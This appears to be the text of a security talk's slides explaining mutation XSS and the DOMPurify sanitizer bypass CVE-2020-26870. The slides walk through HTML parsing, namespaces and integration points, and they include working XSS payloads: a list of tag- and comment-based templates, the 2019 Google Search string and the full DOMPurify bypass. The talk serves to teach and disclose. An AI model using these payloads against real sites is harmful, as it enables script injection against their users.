Mutation XSS & CVE-2020-26870

Kévin GERVOT (Mizu)

Cybersecurity student at ESAIP

CTF Player @Rhackgondins

Bug Hunter

https://mizu.re

@kevin_mizu

HTML Sanitizer

In data sanitization, HTML sanitization is the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired. HTML sanitization can be used to protect against attacks such as cross-site scripting (XSS) by sanitizing any HTML code submitted by a user.

Source: wikipedia.org

Examples: DOMPurify, sanitize-html, js-xss...

Basic client-side sanitizer

Browser API: DOMParser

HTML Input

<html>
    <head></head>
    <body>
    	<h1 id="title"> Hello World! </h1>
    </body>
</html>

DOM Tree

Browser API: DOMParser

var html      = "XXX";
var mime_type = "text/html";
var dom_tree  = new DOMParser().parseFromString(html, mime_type);

dom_tree
> #document
<html>
    <head></head>
    <body>XXX</body>
</html>

Browser API: NodeIterator

var currentNode;
var input    = "<h1>HELLO</h1><h2>World!</h2><span>TEST</span>"; 
var dom_tree = new DOMParser().parseFromString(input, "text/html");

var nodeIterator = document.createNodeIterator(dom_tree);
while ((currentNode = nodeIterator.nextNode())) {

    switch(currentNode.nodeType) {
        case currentNode.ELEMENT_NODE:
            console.log(currentNode.nodeName.toLowerCase());
    }

}

// Output:
html
head
body
h1
h2
span
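
A NodeIterator returns nodes in document order, that is a pre-order depth-first walk of the tree. The sketch below reproduces that order without a browser, using a plain-object stand-in for the parsed document; the `tree` object and the `walk` helper are illustrative assumptions, not browser APIs, and text nodes are left out.

```javascript
// Plain-object stand-in for the parsed DOM tree (no browser required).
const tree = {
    name: "html",
    children: [
        { name: "head", children: [] },
        { name: "body", children: [
            { name: "h1", children: [] },
            { name: "h2", children: [] },
            { name: "span", children: [] },
        ] },
    ],
};

// Pre-order depth-first walk: a node first, then its children left to right.
function* walk(node) {
    yield node.name;
    for (const child of node.children) {
        yield* walk(child);
    }
}

const visited = [...walk(tree)];
console.log(visited.join(" ")); // html head body h1 h2 span
```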

"Simple" example

class Sanitizer {

    constructor() {
        this.version = "1.0.0";
        this.creator = "@kevin_mizu";
        // allow-lists (shortened on the slide)
        this.ALLOWED_TAGS = ["a", "abbr", /* ... */ "html", "head", "h1", "body"];
        this.ALLOWED_ATTRIBUTES = ["accept", "action", /* ... */ "xmlns", "slot"];
    }

    sanitize = (input) => {
        var currentNode;
        // parse the user input
        var dom_tree = new DOMParser().parseFromString(input, "text/html");

        // iterate over all nodes
        var nodeIterator = document.createNodeIterator(dom_tree);
        while ((currentNode = nodeIterator.nextNode())) {

            switch(currentNode.nodeType) {
                // in case it is an element node
                case currentNode.ELEMENT_NODE:
                    var tag_name   = currentNode.nodeName.toLowerCase();
                    var attributes = currentNode.attributes;

                    // sanitize tags
                    if (!this.ALLOWED_TAGS.includes(tag_name)){
                        currentNode.parentNode.removeChild(currentNode);
                        // the node is gone: skip the attribute check
                        break;
                    }

                    // sanitize attributes
                    for (let i=0; i < attributes.length; i++) {
                        if (!this.ALLOWED_ATTRIBUTES.includes(attributes[i].name)){
                            currentNode.parentNode.removeChild(currentNode);
                            break;
                        }
                    }
            }
        }
        // return the sanitized value
        return dom_tree.documentElement.innerHTML;
    }
}

// use the sanitizer
var s 	 = new Sanitizer();
var safe = s.sanitize("<h1>HTML INPUT</h1>");
document.write(safe);

Mutation XSS

https://security.stackexchange.com/questions/46836/what-is-mutation-xss-mxss

Simple mutation

<svg>
    <p></p>
    mutation
</svg>

2019 - Google Search mXSS

By Masato Kinugawa

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Simple mXSS payloads

Tag based

iframe | noscript | textarea | style | xmp | noframes | script | noembed | title

<vulnerable><p id="</vulnerable><img src=x onerror=alert()>">mXSS</p>
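
The template above can be expanded for every tag in the list. This is a minimal sketch of that expansion: `buildTagPayload` is a hypothetical helper name, and the only assumption about the tags is the one the slide makes, namely that their content is not parsed as markup in at least some parsing contexts.

```javascript
// Tags taken from the list above.
const RAW_TEXT_TAGS = [
    "iframe", "noscript", "textarea", "style", "xmp",
    "noframes", "script", "noembed", "title",
];

// Hypothetical helper: replace <vulnerable> in the slide's template with a real tag.
function buildTagPayload(tag) {
    return `<${tag}><p id="</${tag}><img src=x onerror=alert()>">mXSS</p>`;
}

const payloads = RAW_TEXT_TAGS.map(buildTagPayload);
console.log(payloads.join("\n"));
```

Each generated string only becomes dangerous if the sanitizer and the browser disagree on where the tag's content ends, so the list is a starting point for testing rather than a set of working exploits.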


Comment based

<!-- <p id="---><img src=x onerror=alert()>">mXSS</p>
<![CDATA[ <! <p id="]]><img src=x onerror=alert()>">mXSS</p>
<! <p id="!><img src=x onerror=alert()>">mXSS</p>
<? <p id="?><img src=x onerror=alert()>">mXSS</p>
</ <p id="/><img src=x onerror=alert()>">mXSS</p>

Against a real sanitizer, these simple mutation XSS payloads won't work ...

CVE-2020-26870
mXSS in DOMPurify < 2.0.17

By SecurityMB (Michał Bentkowski)

Exploit

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

WHATWG

The Web Hypertext Application Technology Working Group is a community of people interested in evolving HTML and related technologies. The WHATWG was founded by individuals from Apple Inc., the Mozilla Foundation and Opera Software, leading Web browser vendors, in 2004.

Source: wikipedia.org

Style parsing

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

Namespaces

<html>
    <head></head>
    <body>
    	HTML NAMESPACE
        
        <svg>
        	SVG NAMESPACE
        </svg>
        
        <math>
        	MATHML NAMESPACE
        </math>
    </body>
</html>

HTML Namespace | SVG Namespace | MathML Namespace

Namespaces differences example

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

<math>
    <style>
        <a href='https://mizu.re'>HELLO</a>
    </style>
</math>

HTML namespace | MathML namespace

Exploit chain

Finding double mutation

HTML Input

<form id="outer">
    <div>
</form>
<form id="inner">
    <input>

1st Parsing

<form id="outer">
    <div>
        <form id="inner">
            <input>
        </form>
    </div>
</form>

2nd Parsing

<form id="outer">
    <div>
        <input>
    </div>
</form>
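
The parse, serialize, re-parse sequence shown above can be traced with a small helper. This is a sketch under stated assumptions: `traceMutations` and `roundTrip` are hypothetical names, and the round trip is injected so the code runs outside a browser. In a browser, `roundTrip` could be something like `html => new DOMParser().parseFromString(html, "text/html").body.innerHTML`. The stub below only replays the three states from the slides.

```javascript
// Apply a parse/serialize round trip until the markup stops changing.
function traceMutations(html, roundTrip, maxPasses = 5) {
    const steps = [html];
    for (let i = 0; i < maxPasses; i++) {
        const last = steps[steps.length - 1];
        const next = roundTrip(last);
        if (next === last) break; // stable: no further mutation
        steps.push(next);
    }
    return steps;
}

// Stand-in for a real browser round trip, replaying the states shown on the slides.
const input  = '<form id="outer"><div></form><form id="inner"><input>';
const first  = '<form id="outer"><div><form id="inner"><input></form></div></form>';
const second = '<form id="outer"><div><input></div></form>';
const table  = new Map([[input, first], [first, second]]);
const stubRoundTrip = (html) => (table.has(html) ? table.get(html) : html);

const steps = traceMutations(input, stubRoundTrip);
console.log(steps.length); // 3: input, 1st parsing, 2nd parsing
```

More than two entries in `steps` means the serialized output of the first parsing changed again when re-parsed, which is the double mutation this part of the talk is looking for.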

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag

Exploit chain idea

HTML Input

<form id="outer">
    <NAMESPACE A>
        <form id="inner">
            <NAMESPACE B>
            	<style>
                MALICIOUS INPUT
                </style>
            </NAMESPACE B>
        </form>
    </NAMESPACE A>
</form>

1st Parsing

<form id="outer">
    <NAMESPACE A>
        <NAMESPACE B></NAMESPACE B>
        <style>MALICIOUS INPUT</style>
    </NAMESPACE A>
</form>

2nd Parsing

MALICIOUS INPUT is parsed as TEXT on the 1st parsing and as HTML on the 2nd parsing.

Integration Points

<math>
    <mtext>
        <style>
            <a href="https://mizu.re/"></a>
        </style>
    </mtext>
</math>

MathML namespace -> <mtext> tag (integration point) -> HTML namespace

Exceptions

<math>
    <mtext>
        <mglyph>
            <style>
                <a href="https://mizu.re/"></a>
            </style>
        </mglyph>
    </mtext>
</math>

MathML namespace -> <mtext> tag -> <mglyph> tag -> MathML namespace

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag
Content of a text or HTML integration point (e.g. <mtext>) = HTML namespace
Exception: <mglyph> directly inside <mtext> = MathML namespace
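
The rules summarized above can be written as a toy model that decides how the content of a <style> tag is treated, given its ancestors. This is a deliberately simplified sketch, not the WHATWG algorithm: it ignores SVG integration points, annotation-xml and the HTML tags that break out of foreign content, and the function names are hypothetical.

```javascript
// MathML text integration points: their children are parsed with HTML rules.
const TEXT_INTEGRATION_POINTS = new Set(["mi", "mo", "mn", "ms", "mtext"]);

// Namespace of a child element, given its parent ({ tag, ns }) or null at the top level.
function childNamespace(parent, tag) {
    const inHtmlContext =
        parent === null ||
        parent.ns === "html" ||
        (parent.ns === "mathml" &&
            TEXT_INTEGRATION_POINTS.has(parent.tag) &&
            tag !== "mglyph" && tag !== "malignmark"); // the exception
    if (!inHtmlContext) return parent.ns; // stay in the foreign namespace
    if (tag === "math") return "mathml";
    if (tag === "svg") return "svg";
    return "html";
}

// Namespace of the last element of a path of tag names, outermost first.
function namespaceOf(path) {
    let parent = null;
    for (const tag of path) {
        parent = { tag, ns: childNamespace(parent, tag) };
    }
    return parent.ns;
}

// "text" if a <style> under these ancestors holds raw text, "markup" otherwise.
function styleContentKind(ancestors) {
    return namespaceOf([...ancestors, "style"]) === "html" ? "text" : "markup";
}

console.log(styleContentKind([]));                           // text
console.log(styleContentKind(["math"]));                     // markup
console.log(styleContentKind(["math", "mtext"]));            // text
console.log(styleContentKind(["math", "mtext", "mglyph"]));  // markup
// Exploit shape: before and after the inner <form> is dropped on re-parsing
console.log(styleContentKind(["form", "math", "mtext", "form", "mglyph"])); // text
console.log(styleContentKind(["form", "math", "mtext", "mglyph"]));         // markup
```

The last two calls show the whole idea of the chain: the same <style> content is text while the inner <form> sits between <mtext> and <mglyph>, and markup once that <form> disappears.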

Final exploit - Step 1

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Final exploit - Step 2

Malicious input = text = safe, thanks to the <mtext> integration point: the inner <form>, <mglyph> and <style> are HTML elements

MathML namespace -> Integration Point -> HTML namespace

<form>
    <math>
        <mtext>
            <form>
                <mglyph>
                    <style>
                        </math><img src onerror=alert(1)>
                    </style>
                </mglyph>
            </form>
        </mtext>
    </math>
</form>

Final exploit - Step 2->3

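After serialization and re-parsing, the inner <form> is dropped: <mglyph> becomes a direct child of <mtext> (the exception), so <style> moves from the HTML namespace to the MathML namespace.

Its content is now parsed as HTML: </math> closes <math> and <img> escapes the MathML namespace.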

Final exploit - Step 3

HTML namespace

<form>
    <math>
        <mtext>
            <mglyph>
                <style></style>
            </mglyph>
        </mtext>
    </math>
    <img src="" onerror="alert(1)">
</form>
